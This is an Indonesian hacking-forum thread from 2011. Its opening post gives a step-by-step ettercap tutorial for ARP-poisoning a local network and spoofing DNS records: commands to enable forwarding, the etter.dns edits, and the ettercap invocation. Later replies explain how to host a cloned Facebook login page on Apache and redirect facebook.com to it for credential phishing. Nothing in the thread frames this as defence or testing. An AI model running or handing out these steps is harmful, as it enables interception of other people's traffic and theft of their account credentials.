ettercap dns_spoof #PART 1
#1
salam Wink
ane mau share dns_spoof dengan ettercap nih. tp pake part boleh kan? Big Grin.
oke dah no bacot Sleepy

1. forward dulu Big Grin
Quote:#echo 1 > /proc/sys/net/ipv4/ip_forward
untuk melihat statusnya ketik:
Quote:#cat /proc/sys/net/ipv4/ip_forward
kalo muncul angka "0" berarti blom di forward, kalo muncul angka "1" brarti udah d forward. setau ane sih gitu Big Grin

2. edit file "etter.dns" untuk meracuni dns ke ip lain nih
gunakan editor text kesayangan anda. disini ane pake "nano".
Quote:#nano /usr/local/share/ettercap/etter.dns

3. lalu,
ubah nih:
dns victim ane : koecroet.web.id
yang akan forward ke ip : 117.102.253.131
Quote:################################
# microsoft sucks Wink
# redirect it to www.linux.org
#

koecroet.web.id A 117.102.253.131
*.koecroet.web.id A 117.102.253.131
www.koecroet.web.id PTR 117.102.253.131 # Wildcards in PTR are not allowed

##########################################
jangan lupa di save Wink

4. langkah terakhir ketik:
Quote:#ettercap -T -q -i [interfaces] -P dns_spoof -M arp // //
Quote:contoh: #ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

5. udah deh jalan Big Grin

hasilnya nih pas ane buka http://www.koecroet.web.id
SS:
Spoiler! :
[Image: dnsspoof.jpg]

dtunggu kritik dan sarannya Big Grin

http://indonesianbacktrack.or.id/forum/thread-706.html << #PART | 2 nya om
[shcode=This_site_xss-ed]

#2
(08-28-2011, 09:16 PM)Liyan Oz Wrote: kk kalo ngejalanin ettercap pake GUI kenapa error ya ??

tapi pas dari terminal

Code:
# ettercap -G

itu langsung bisa,, itu kenapa ya om ?

gtau dah Big Grin, ane jalaninnya selalu dari terminal soalnya Big Grin
[shcode=This_site_xss-ed]

#3
THE koecroet MAKIN membahayakan... om Big Grin

#4
hehe, emang ane polisi om membahayakan KANTONG. wkwkwk
[shcode=This_site_xss-ed]

#5
mantab bro, thx udh di share Smile

#6
Mumpung lg pada ngumpul
Ane mw tanya
Gmn nih penulisan forwarding dns td kalo misalkan ane bikin fake login facebook di http://192.168.0.96/login
Apakah facebook.com A 192.168.0.96/login
?
Mohon pencerahan kalo pake dir login gt
Kalo pake root webserver lgsung localhost gag mungkin cz rootnya penting bgt walaupun emg bs diganti
Tp intinya usahakan supaya pake dir login

#7
(08-29-2011, 03:35 AM)c0d3HitLER Wrote: Mumpung lg pada ngumpul
Ane mw tanya
Gmn nih penulisan forwarding dns td kalo misalkan ane bikin fake login facebook di http://192.168.0.96/login
Apakah facebook.com A 192.168.0.96/login
?
Mohon pencerahan kalo pake dir login gt
Kalo pake root webserver lgsung localhost gag mungkin cz rootnya penting bgt walaupun emg bs diganti
Tp intinya usahakan supaya pake dir login

mmm ane juga kurang tau kalo bisa di buat kayak gitu !! tapi mungkin halaman login.php/login.html di rename aja jadi index.html/index.php !!! kan otomatis di load saat kita browse ke IP Address nya !! kayaknya gitu sehh !!!

#8
klo DNS itu harus IP bro, namanya aja Domain Name Server dan prosesnya merubah IP menjadi nama yg mudah kita ingat dan sebaliknya Smile
jadi benar apa yg dikatakan oleh bro RR12 Smile

#9
(08-29-2011, 03:35 AM)c0d3HitLER Wrote: Mumpung lg pada ngumpul
Ane mw tanya
Gmn nih penulisan forwarding dns td kalo misalkan ane bikin fake login facebook di http://192.168.0.96/login
Apakah facebook.com A 192.168.0.96/login
?
Mohon pencerahan kalo pake dir login gt
Kalo pake root webserver lgsung localhost gag mungkin cz rootnya penting bgt walaupun emg bs diganti
Tp intinya usahakan supaya pake dir login

kalo mau bikin fake login bisa om, tapi sebelumnya page login facebook kita "save as" dulu dengan nama "index.html" di "/var/www/index.html". lalu jangan lupa untuk mengktifkan apachenya dengan "/etc/init.d/apache2 start" udah deh Big Grin.
dengan begitu tinggal edit deh "etter.dns" nya dengan format:
facebook.com A [ip-address anda]
nanti dah ane bikin #PART 2 nya Big Grin, kan yg ini baru part 1 Tongue
[shcode=This_site_xss-ed]

#10
Sorry" aku mikirnya ke webserver apache ku yg di windows pake appserv

Kalo di backtrack kan html biasa paling cm isinya working apa gt kan

Sip udah ada penceraham dr yg tadinya puyeng Smile






Users browsing this thread: 1 Guest(s)